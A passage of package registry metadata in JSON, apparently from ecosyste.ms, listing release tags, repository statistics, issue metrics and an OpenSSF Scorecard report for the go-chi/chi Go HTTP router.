ub.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.171Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/gopkg.in/go-chi/chi.v0","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v0","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v0","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/go-chi/chi.v0/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v0/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v0/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v0/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v0/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v0/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v0/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11361285,"name":"github.com/go-Chi/Chi","ecosystem":"go","description":"","homepage":"https://github.com/go-Chi/Chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-Chi/Chi","keywords_array":[],"namespace":"github.com/go-Chi","versions_count":8,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_synced_at":"2026-08-12T02:06:10.778Z","created_at":"2025-02-18T07:34:04.746Z","updated_at":"2026-08-12T02:06:10.778Z","registry_url":"https://pkg.go.dev/github.com/go-Chi/Chi","install_command":"go get github.com/go-Chi/Chi","documentation_url":"https://pkg.go.dev/github.com/go-Chi/Chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-c